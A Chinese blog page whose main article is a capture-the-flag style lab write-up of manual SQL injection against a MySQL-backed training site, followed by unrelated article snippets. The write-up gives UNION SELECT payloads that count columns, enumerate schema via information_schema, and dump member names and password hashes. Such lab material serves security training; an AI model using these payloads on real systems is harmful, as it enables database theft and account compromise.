当前位置：首页 > news >正文

SQL手工注入漏洞测试(MySQL数据库)

news 2025/9/14 23:23:50

一、实验平台

https://www.mozhe.cn/bug/detail/elRHc1BCd2VIckQxbjduMG9BVCtkZz09bW96aGUmozhe

二、实验目标

获取到网站的KEY，并提交完成靶场。

三、实验步骤

①、启动靶机，进行访问查找可能存在注入的页面

②、通过测试判断注入点的位置(id=)

(1)、注入点的判断方式 and 1=1 页面正常 and 1=2 页面错误

(2)、可能存在注入，随意填写（说明id =1 后边有注入点）（拼写的语句是为了测试你写的语句有没有带入到数据库执行，有影响说明带入数据库查询，所以说明有注入点。）

③、猜解列名数量（字段数）order by x (错误与正常的正常值)

通过测试4没错，5错误，说明列名数量为4

http://124.70.64.48:41613/new_list.php?id=-1 union select 1,2,3,4

④、信息收集获取网站的数据库版本、数据库名字等

数据库版本 version() 5.7.22-0ubuntu0.16.04.1（5.0以上高版本，）

数据库名字database() mozhe_Discuz_StormGroup

数据库用户user() root@localhost

操作系统@@version_compile_os Linux

⑤、查询指定数据库名mozhe_Discuz_StormGroup下边第一个表名信息

union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='mozhe_Discuz_StormGroup'

⑥、查询指定表名下的列名信息(查询有哪些列名)

union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='StormGroup_member'

⑦、查询指定列名下数据：

union select 1,name,password,4 from StormGroup_member

这里我们得到一个用户名，还有一串数字，我们根据靶场提示，可知利用md5解密然后我们登录发现并不对，后来经过查找才知道上边的语句只显示第一行数据。

⑧、猜解多个数据可以采用limit x,1变动猜解(列名下的数据有多行时候可以变动猜解)

union select 1,name,password,4 from StormGroup_member  limit 0,1

union select 1,name,password,4 from StormGroup_member  limit 1,1

这里我们发现一个新的密码，然后解密试着登录一下

⑨、果然利用第二种方法查找的密码是正确的，接下来我们将靶场拿下拿到我们所需要提交的KEY

SQL手工注入漏洞测试(MySQL数据库)

一、实验平台 https://www.mozhe.cn/bug/detail/elRHc1BCd2VIckQxbjduMG9BVCtkZz09bW96aGUmozhe 二、实验目标获取到网站的KEY，并提交完成靶场。三、实验步骤 ①、启动靶机，进行访问查找可能存在注入的页面 ②、通过测试判断注入点的位置(id) (1)…...

编程日记 2023/12/25 20:56:10

JAVA WEB用POI导出EXECL多个Sheet

前端方法：调用exportInfoPid这个方法并传入要查询的id即可，也可以用其他参数看个人需求 function exportInfoPid(id){window.location.href 服务地址"/exportMdsRoutePid/"id; } 后端控制层代码 Controller Scope("prototype") R…...

编程日记 2023/12/25 20:55:08

@RequestBody详解：用于获取请求体中的Json格式参数

获取请求体中的Json格式参数 （RequestBody） 当前端将一些比较复杂的参数转换成Json字符串通过请求体传递过来给后端，这种时候就可以使用RequestBody注解获取请求体中的数据。而json字符串是包含在请求体中的，使用请求体传参通常…...

编程日记 2023/12/25 20:54:07

AI日报：2024年人工智能对各行业初创企业的影响

欢迎订阅专栏《AI日报》获取人工智能邻域最新资讯文章目录 2024年人工智能对初创企业的影响具体行业医疗金融服务运输与物流等新趋势 2024年人工智能对初创企业的影响 2023年见证了人工智能在各个行业的快速采用和创新。随着我们步入2024年，人工智能初创公司正…...

编程日记 2023/12/25 20:53:06

QAM 归一化因子

文章目录前言一、归一化1、作用2、OFDM 归一化因子二、归一化因子公式前言在做通信系统仿真时，遇到了 QAM 归一化因子的求解，对这里不是很清楚，因此本文对 QAM（正交振幅调制）归一化因子学习做了一下记录。一、归…...

编程日记 2023/12/25 20:46:00

PoE交换机传输距离是多少？100米？250米？

你们好，我的网工朋友。今天和你聊聊PoE交换机，之前有系统地给你讲解过一篇，可以先回顾一下哈：《啥样的交换机才叫高级交换机？这张图告诉你》为什么都说PoE交换机好？它最显著的特点就是： 可…...

编程日记 2023/12/25 20:44:59

Jenkins Pipeline脚本优化：为Kubernetes应用部署增加状态检测

引言在软件部署的世界中，Jenkins已经成为自动化流程的代名词。不断变化的技术环境要求我们持续改进部署流程以满足现代应用部署的需要。在本篇博客中，作为一位资深运维工程师，我将分享如何将Jenkins Pipeline进化至不仅能支持部署应用直至R…...

编程日记 2023/12/25 20:43:58

R语言基础 | 安徽某高校《统计建模与R软件》期末复习

第一节数字、字符与向量 1.1 向量的赋值 c<-(1,2,3,4,5) 1.2 向量的运算对于向量，我们可以直接对其作加（），减（-），乘（*），除（/&#xff09…...

编程日记 2023/12/25 20:42:58

Linux部署MeterSphere结合内网穿透实现远程访问服务管理界面

文章目录前言1. 安装MeterSphere2. 本地访问MeterSphere3. 安装 cpolar内网穿透软件4. 配置MeterSphere公网访问地址5. 公网远程访问MeterSphere6. 固定MeterSphere公网地址前言 MeterSphere 是一站式开源持续测试平台, 涵盖测试跟踪、接口测试、UI 测试和性能测试等功能&am…...

编程日记 2023/12/25 20:37:53

MyBatis见解4

10.MyBatis的动态SQL 10.5.trim标签 trim标签可以代替where标签、set标签 mapper //修改public void updateByUser2(User user);<update id"updateByUser2" parameterType"User">update user<!-- 增加SET前缀，忽略，后缀…...

编程日记 2023/12/25 20:36:52

Linux操作系统——进程(三) 进程优先级

进程优先级首先呢，我们知道一个进程呢（或者也可以叫做一个任务），它呢有时候要在CPU的运行队列中排队，要么有时候阻塞的时候呢又要在设备的等待队列中排队，其实我们排队的本质就是：确认优先级。…...

编程日记 2023/12/25 20:35:51

插入排序详解（C语言）

前言插入排序是一种简单直观的排序算法，在小规模数据排序或部分有序的情况下插入排序的表现十分良好，今天我将带大家学习插入排序的使用。let’s go ! ! ! 插入排序插入排序的基本思想是将待排序的序列分为已排序和未排序两部分。初始时&#xff0c…...

编程日记 2023/12/25 20:34:50

Json和Xml

一、前言学习心得：C# 入门经典第8版书中的第21章《Json和Xml》二、Xml的介绍 Xml的含义： 可标记性语言，它将数据以一种特别简单文本格式储存。让所有人和几乎所有的计算机都能理解。 XML文件示例： <?xml version"1.…...

编程日记 2023/12/25 20:33:49

STM32 支持IAP的bootloader开发，使用串口通过Ymodem协议传输固件

资料下载: https://download.csdn.net/download/vvoennvv/88658447 一、概述关于IAP的原理和Ymodem协议，本文不做任何论述，本文只论述bootloader如何使用串口通过Ymodem协议接收升级程序并进行IAP升级，以及bootloader和主程序两个工程的配置…...

编程日记 2023/12/25 20:31:43

【SVN】centos7搭建svn--亲测能通

centos7.6搭建svn 1 知识小课堂1.1 CentOS1.2 SVN 2 搭建过程2.1 前期准备2.2 通过yum命令安装svnserve2.3 创建版本库目录2.4 创建svn版本库2.5 配置修改2.5 防火墙配置2.6 启动或关闭svn服务器2.6.1 进程守护2.6.2 检测svn端口3690是否已经监听：2.6.3 关闭SVN 2.7…...

编程日记 2023/12/25 20:30:42

MY FILE SERVER: 1

下载地址 https://download.vulnhub.com/myfileserver/My_file_server_1.ova 首先我们需要发现ip 我的kali是59.162所以167就是靶机的然后我们拿nmap扫一下端口 nmap -sV -p- 192.168.59.167 扫完发现有七个端口开放按照习惯先看80 没看到有啥有用信息,用nikto扫一下 nik…...

编程日记 2023/12/25 20:27:39

Day70力扣打卡

打卡记录收集足够苹果的最小花园周长（找规律二分） 链接 class Solution:def minimumPerimeter(self, neededApples: int) -> int:l, r 1, 10 ** 5while l < r:mid (l r) >> 1if 2 * (2 * (mid ** 3) 3 * (mid ** 2) mid) > nee…...

编程日记 2023/12/25 20:26:38

3. 行为模式 - 迭代器模式

亦称： Iterator 意图迭代器模式是一种行为设计模式， 让你能在不暴露集合底层表现形式 （列表、栈和树等） 的情况下遍历集合中所有的元素。问题集合是编程中最常使用的数据类型之一。尽管如此， 集合只是一组对象的…...

编程日记 2023/12/25 20:22:35

场景：主要是用来发布文件。一、rsync服务器端架设 1、安装 wget https://download.samba.org/pub/rsync/src/rsync-3.0.6.tar.gz tar -zxvf rsync-3.0.6.tar.gz ./configure --prefix/usr/local/rsync make make install 2、配置 2.1、配置rsyncd.conf 不存在…...

编程日记 2023/12/25 20:21:34

生成xcframework

打包 XCFramework 的方法 XCFramework 是苹果推出的一种多平台二进制分发格式，可以包含多个架构和平台的代码。打包 XCFramework 通常用于分发库或框架。使用 Xcode 命令行工具打包通过 xcodebuild 命令可以打包 XCFramework。确保项目已经配置好需要支持的平台…...

编程新知 2025/8/31 7:31:14

从零实现富文本编辑器#5-编辑器选区模型的状态结构表达

先前我们总结了浏览器选区模型的交互策略，并且实现了基本的选区操作，还调研了自绘选区的实现。那么相对的，我们还需要设计编辑器的选区表达，也可以称为模型选区。编辑器中应用变更时的操作范围，就是以模型选区为基准来…...

编程新知 2025/9/5 17:56:03

【JVM】- 内存结构

引言 JVM：Java Virtual Machine 定义：Java虚拟机，Java二进制字节码的运行环境好处： 一次编写，到处运行自动内存管理，垃圾回收的功能数组下标越界检查（会抛异常，不会覆盖到其他代码…...

编程新知 2025/9/9 14:49:12

UDP(Echoserver)

网络命令 Ping 命令检测网络是否连通使用方法: ping -c 次数网址ping -c 3 www.baidu.comnetstat 命令 netstat 是一个用来查看网络状态的重要工具. 语法：netstat [选项] 功能：查看网络状态常用选项： n 拒绝显示别名&#…...

编程新知 2025/9/9 14:51:30

多模态大语言模型arxiv论文略读（108）

CROME: Cross-Modal Adapters for Efficient Multimodal LLM ➡️ 论文标题：CROME: Cross-Modal Adapters for Efficient Multimodal LLM ➡️ 论文作者：Sayna Ebrahimi, Sercan O. Arik, Tejas Nama, Tomas Pfister ➡️ 研究机构: Google Cloud AI Re…...

编程新知 2025/9/12 19:00:19